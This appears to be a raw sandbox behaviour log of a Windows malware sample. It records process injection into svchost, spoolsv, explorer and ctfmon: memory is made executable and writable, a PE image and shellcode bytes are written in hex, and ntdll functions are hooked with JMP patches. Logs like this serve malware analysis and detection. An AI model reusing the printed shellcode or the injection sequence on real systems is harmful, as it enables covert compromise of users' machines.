Memory written PID: 1144 Path: C:\WINDOWS\system32\svchost.exe Base: 990000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2033600432
Memory attributes changed PID: 1144 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2033607814
Memory written PID: 1144 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 08 84 success or wait 2033657848
Memory allocated PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2033666079
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2033668792
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2033671498
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2033689470
Memory written PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2035753773
Thread delayed Time: 0 TID: 4214 success or wait 2035755100
Memory written PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2035778576
Memory allocated PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: A40000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2035779727
System info queried Type: BasicInformation success or wait 2035780567
System info queried Type: ProcessorInformation success or wait 2035781128
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2035797868
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2035798903
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2035815745
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2035816220
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2035817347
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2035818135
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2035818549
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2035818962
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2035820340
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1F70000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2035820837
System info queried Type: BasicInformation success or wait 2035821730
System info queried Type: ProcessorInformation success or wait 2035822078
Memory written PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: A40000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2035851012
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2035851317
Memory written PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 13 84 success or wait 2035873679
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write conflicting addresses 2035875760
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB16000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write conflicting addresses 2035875860
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB50000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2035875955
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB50000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2035876137
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB50000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2035877121
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB50000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2035877223
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB50000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2035879144
Thread created PID: 1636 TID: 3448 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2035881266
Memory allocated PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2035881989
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2035882103
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2035883841
Thread created PID: 1636 TID: 3452 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2035884120
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2035884274
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2036753150
Thread delayed Time: 0 TID: 4214 success or wait 2036753496
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2036753830
System info queried Type: BasicInformation success or wait 2036754039
System info queried Type: ProcessorInformation success or wait 2036754264
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2036784567
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2036785026
Memory allocated PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A30000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2036815875
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2036815957
System info queried Type: BasicInformation success or wait 2036816088
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2036816145
System info queried Type: ProcessorInformation success or wait 2036816341
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2036816546
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2036816751
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2036816893
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2036817326
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2036817381
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2036817768
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2036818019
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2036818182
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2036818253
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2036818486
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2036818775
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2036819178
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2036819261
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2036819551
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2036819806
System info queried Type: BasicInformation success or wait 2036819852
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2036820308
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2036820587
System info queried Type: ProcessorInformation success or wait 2036820777
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2036821464
System info queried Type: BasicInformation success or wait 2036822061
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB76E20 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2036822112
System info queried Type: ProcessorInformation success or wait 2036822272
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A30000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2036848522
Thread created PID: 1636 TID: 3896 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2036849043
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2036849363
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 12 84 success or wait 2036873800
Thread delayed Time: 0 TID: 4214 success or wait 2036874397
Thread created PID: 1636 TID: 3912 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2036874832
Thread delayed Time: 0 TID: 4214 success or wait 2036876446
Thread delayed Time: 0 TID: 4214 success or wait 2036876589
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2036876651
System info queried Type: BasicInformation success or wait 2036876790
System info queried Type: ProcessorInformation success or wait 2036876921
Memory allocated PID: 448 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2036877456
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2036877822
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2036878261
Memory attributes changed PID: 448 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2036878391
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2036878493
Memory attributes changed PID: 448 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2036878706
Memory attributes changed PID: 448 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2036878973
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2036879243
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2036879457
Memory written PID: 448 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2037985901
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2037987153
Thread delayed Time: 0 TID: 4214 success or wait 2037987415
Memory written PID: 448 Path: C:\WINDOWS\system32\svchost.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2038029443
Thread delayed Time: 0 TID: 4214 success or wait 2038031624
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2038032514
Thread delayed Time: 0 TID: 4214 success or wait 2038033730
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2038034608
Thread delayed Time: 0 TID: 4214 success or wait 2038035008
Memory allocated PID: 448 Path: C:\WINDOWS\system32\svchost.exe Base: A60000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2038035250
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2038036469
System info queried Type: BasicInformation success or wait 2038037029
System info queried Type: ProcessorInformation success or wait 2038037795
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2038038501
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2038038680
System info queried Type: BasicInformation success or wait 2038040241
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2038041241
System info queried Type: ProcessorInformation success or wait 2038041596
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2038041743
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2038042600
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2038043862
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2038044359
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2038045004
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2038045880
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB90A90 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2038046002
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2038046562
System info queried Type: BasicInformation success or wait 2038047150
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2038047966
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2038048432
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2038048732
System info queried Type: BasicInformation success or wait 2038049461
System info queried Type: ProcessorInformation success or wait 2038049927
System info queried Type: ProcessorInformation success or wait 2038050479
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2038051365
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2038052469
Memory written PID: 448 Path: C:\WINDOWS\system32\svchost.exe Base: A60000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2038072122
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2038072708
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2038073365
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2038073870
